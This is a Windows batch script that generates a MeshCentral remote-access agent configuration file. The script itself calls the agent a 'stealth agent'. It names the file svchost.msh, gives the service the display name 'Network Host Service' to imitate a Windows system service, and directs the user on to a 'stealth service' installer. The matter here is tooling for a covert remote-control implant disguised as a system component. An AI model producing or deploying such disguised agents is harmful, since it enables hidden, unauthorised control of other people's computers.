@echo off
REM ============================================================================
REM Modus MSH Configuration Helper
REM ============================================================================
REM Author: Joel Aaron Guff
REM Version: 1.0
REM This script helps users configure the svchost.msh file with their
REM 
REM specific MeshCentral server connection details.
REM ============================================================================

echo Modus MSH Configuration Helper
echo ===============================

echo.
echo This script will help you configure the Modus stealth agent
echo to connect to your MeshCentral server.
echo.
echo You will need:
echo   1. Your MeshCentral server URL
echo   2. Mesh ID from your MeshCentral admin panel
echo   3. Server ID (certificate hash) from MeshCentral
echo   4. Mesh group name (optional)
echo.

set /p continue="Continue with configuration? (y/N): "
if /i not "%continue%"=="y" exit /b 0

echo.
echo ============================================================================
echo MeshCentral Server Configuration
echo ============================================================================

REM Get server URL
set "serverURL="
:getServerURL
set /p serverURL="Enter your MeshCentral server URL (e.g., wss://mesh.example.com:443/agent.ashx): "
if "%serverURL%"=="" (
    echo ERROR: Server URL is required
    goto getServerURL
)

REM Get Mesh ID  
set "meshID="
:getMeshID
echo.
echo To find your Mesh ID:
echo   1. Login to MeshCentral as administrator
echo   2. Go to "My Devices" and select your mesh group
echo   3. Click "Add Device" > "Windows" > "Installation"
echo   4. Copy the long hex string after "MeshID="
echo.
set /p meshID="Enter Mesh ID (long hex string starting with 0x): "
if "%meshID%"=="" (
    echo ERROR: Mesh ID is required
    goto getMeshID
)

REM Get Server ID
set "serverID="
:getServerID
echo.
echo To find your Server ID:
echo   1. In the same MeshCentral installation page
echo   2. Copy the long hex string after "ServerID="
echo.
set /p serverID="Enter Server ID (long hex string): "
if "%serverID%"=="" (
    echo ERROR: Server ID is required
    goto getServerID
)

REM Get optional mesh name
echo.
set /p meshName="Enter mesh group name (optional): "
if "%meshName%"=="" set "meshName=TaskMaster Network"

REM Get optional agent name
set /p agentName="Enter agent name (optional): "
if "%agentName%"=="" set "agentName=TaskMaster-Agent"

echo.
echo ============================================================================
echo Configuration Summary
echo ============================================================================
echo Server URL: %serverURL%
echo Mesh ID: %meshID%
echo Server ID: %serverID%
echo Mesh Name: %meshName%
echo Agent Name: %agentName%
echo.

set /p confirm="Is this configuration correct? (y/N): "
if /i not "%confirm%"=="y" (
    echo Configuration cancelled
    pause
    exit /b 0
)

REM Create the svchost.msh file
echo.
echo [INFO] Creating svchost.msh configuration file...

(
echo # TaskMaster MSH Configuration
echo # Generated by TaskMaster Configuration Helper
echo # Date: %date% %time%
echo #
echo # IMPORTANT: This file contains sensitive connection information
echo # Protect this file and delete it after installation for security
echo.
echo # Mesh Information
echo MeshName=%meshName%
echo MeshType=2
echo MeshID=%meshID%
echo.
echo # Server Information
echo ServerID=%serverID%
echo MeshServer=%serverURL%
echo.
echo # Agent Configuration
echo agentName=%agentName%
echo disableUpdate=0
echo logUpdate=1
echo controlChannelDebug=0
echo controlChannelIdleTimeout=300
echo.
echo # Network Configuration
echo WebProxy=
echo ignoreProxyFile=0
echo.
echo # Security Configuration
echo AgentCapabilities=0x00000001
echo coreDumpEnabled=0
echo.
echo # Installation Configuration
echo InstallFlags=0
echo displayName=Network Host Service
echo meshServiceName=Network Host Service
echo.
echo # UI Customization ^(for stealth branding^)
echo background=0,0,0
echo foreground=255,255,255
echo image=default2
) > svchost.msh

if %errorLevel% equ 0 (
    echo [SUCCESS] svchost.msh created successfully!
) else (
    echo [ERROR] Failed to create svchost.msh
    pause
    exit /b 1
)

echo.
echo ============================================================================
echo Configuration Complete!
echo ============================================================================
echo.
echo The svchost.msh file has been created with your configuration.
echo.
echo Next steps:
echo   1. Review the svchost.msh file to verify settings
echo   2. Build Modus components: build_modus.bat
echo   3. Install the stealth service: install_stealth_service.bat
echo.
echo SECURITY NOTES:
echo   - The svchost.msh file contains sensitive server information
echo   - Keep this file secure during deployment
echo   - The installation script will copy it to a secure system location
echo   - Consider deleting the local copy after installation
echo.
echo For more information, see MODUS_README.md
echo.
pause
